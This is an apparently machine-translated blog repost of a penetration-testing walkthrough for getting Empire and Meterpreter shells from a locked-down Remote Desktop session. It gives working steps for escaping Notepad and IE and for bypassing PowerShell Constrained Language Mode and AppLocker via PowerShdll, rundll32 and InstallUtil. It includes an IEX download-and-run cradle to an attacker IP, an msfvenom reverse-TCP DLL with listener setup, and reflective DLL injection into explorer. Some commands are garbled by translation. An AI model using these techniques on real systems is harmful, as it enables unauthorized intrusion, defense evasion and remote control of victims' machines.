Shulou(Shulou.com)06/02 Report--

How to get Empire Shell from remote desktop services, I believe that many inexperienced people do not know what to do, so this paper summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

The editor will show you how to get the target machine Empire shell when you can only access remote desktop services and have AppLocker-protected PowerShell in language-constrained mode. PowerShell is in language-constrained mode, which prevents the use of most PowerShell techniques. In addition, Windows Defender is also a problem that we have to face and solve.

Environmental requirements:

The RDS server releases outbound traffic at port 80.

.net v3.5 (for dll mode in PowerShdll)

Note: powershell.exe is not Powershell. It only hosts assemblies that contain PowerShell and handles I/O.System.Management.Automation.dll

For more information, see the link at the end of the article.

Get shell from RDS notepad

Https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/

Https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/

In the notepad interface menu bar, select help-> View help-> trigger the IE browser to open

Right-click any link in IE-> Save destination as-> Save as lol.ps1 on your desktop

Click View download in IE, press the drop-down list of files, and open-> notepad. Just write powershell.exe in the file and save it again.

Now, once again, right-click-> "Save target as" in IE. Go to the drop-down menu, Save as type, and select all Files. Your saved ps1 file will be displayed, and you can select "run PowerShell" which will pop up a PowerShell command prompt. However, the current PowerShell prompt is in language-constrained mode. We can verify it with the automation variable $ExecutionContext.SessionState.LanguageMode, and we can see that the result is ConstrainedLanguage.

Bypass PoSh constraint mode

First, we download PowerShdll from https://github.com/p3nt4/PowerShdll. Then use python-m SimpleHTTPServer 80 to host powershdll.dll on the Kali Web server. Next, open http://10.7.253.10/PowerShdll.dll in IE. Finally, save it as-> PowerShdll.dll (you can save it in any folder). The C:\ Windows\ Tasks folder is a good place to bypass Applocker because it is usually whitelisted. But navigating to a folder may also be restricted, so in some cases you may need to save it to C:\ Users\ Username\ Desktop (desktop).

I'm not sure how to check DLL rules in an Applocked environment.

Now, let's navigate the PowerShell prompt to the desktop and use rundll32 to execute dll.

Rundll32.\ PowerShdll.dll,main-w

At this point, a new interactive PowerShell prompt should pop up. We validate again with the automation variable $ExecutionContext.SessionState.LanguageMode, and we can see that it has now become FullLanguage (full language mode).

A simpler way

It wasn't until later that I found out that I could have omitted the last two steps. Just use set Base64 false and set Outfile shell to generate an Empire stager. Now in the unrestricted PowerShell, download the shell and execute it directly into memory.

IEX (New-Object Net.WebClient) .DownloadString ('http://10.7.253.18/shell');

If you are lucky, Defender will not intercept, and you will get an Empire shell/agent.

Get meterpreter shell

Generate a dll payload:

Msfvenom-a x64-- platform windows-p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.2 lport=8081-f dll-o msf.dll

Set up the msf listener, using the same payload, host, and port.

Use multi/handlerset host tun0set port 8081set payload windows/x64/meterpreter/reverse_tcpexploit

Download msf.dll using the previous IE "Save as" technique.

For some reason, Windows Defender didn't intercept my payload. Maybe it's because payload's x64 signature has not been recognized by Defender as malware, and I don't know exactly.

Now, we use rundll32 to execute dll. Rundll32 is used because it is a binary file that will not be blocked by Applocker.

Rundll32.\ msf.dll,Control_RunDLL

Meterpreter shell was successfully obtained.

Empire without powershell.exe

Suppose you have established a metasploit session.

In Empire, create an empire listener and stager. The most important thing is to set Base64 to false to prevent stager from calling powershell.exe. Due to a restricted language pattern, powershell.exe cannot be run here.

Uselistener httpset Host 10.7.253.18set Port 4444executebackusestager multi/launcherset Base64 falsegenerate

Now in MSF:

Load powershellpowershell_shell

Copying and pasting empire listener in interactive shell should generate an agent agent in Empire.

More advanced technologies

Bypass powershell constraint patterns and applocker

The following is an article on bypassing whitelist and powershell constraint patterns, which you can read:

Https://improsec.com/blog/babushka-dolls-or-how-to-bypass-application-whitelisting-and-constrained-powershell

1. Use windows/hta to generate a listener and hta stager.

two。 Open ReflectivePick project in visual studio. Add hta base64 shell stager in place and compile dll to ReflectivePick_x64.dll.

3. Use the following PS command to encode DLL as base64 and pipe the results to a text file.

$Content = Get-Content.\ ReflectivePick_x64.dll-Encoding Byte$Encoded = [System.Convert]:: ToBase64String ($Content) $Encoded | Out-File "C:\ Windows\ Tasks\ dll.txt"

4. Copy and paste the contents of dll.txt into the new variable of Invoke-ReflectivePEInjection.ps1.

$dllData = "DLLBASE64_GOES_HERE" $ProcId = (Get-Process explorer). Id$Bytes = [System.Convert]:: FromBase64String ($dllData) Invoke-ReflectivePEInjection-PEBytes $Bytes-ProcId $ProcId

5. Use https://www.base64encode.org/ online Base64 to encode the entire script. Open Bypass project in VS and copy and paste the encoded contents into the encoded variable. Compile it to Bypass.exe using VS.

6. Use installutil.exe to execute bypass.exe

Set-location\\ tsclient\ lkylabscopy-item.\ Bypass.exe c:\ windows\ taskscd c:\ windows\ tasksC:\ windows\ Microsoft.NET\ Framework64\ v4.0.30319\ InstallUtil.exe / logfile= / LogToConsole=false / UC:\ Windows\ Tasks\ Bypass.exe after reading the above, have you mastered how to get Empire Shell from remote desktop service? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.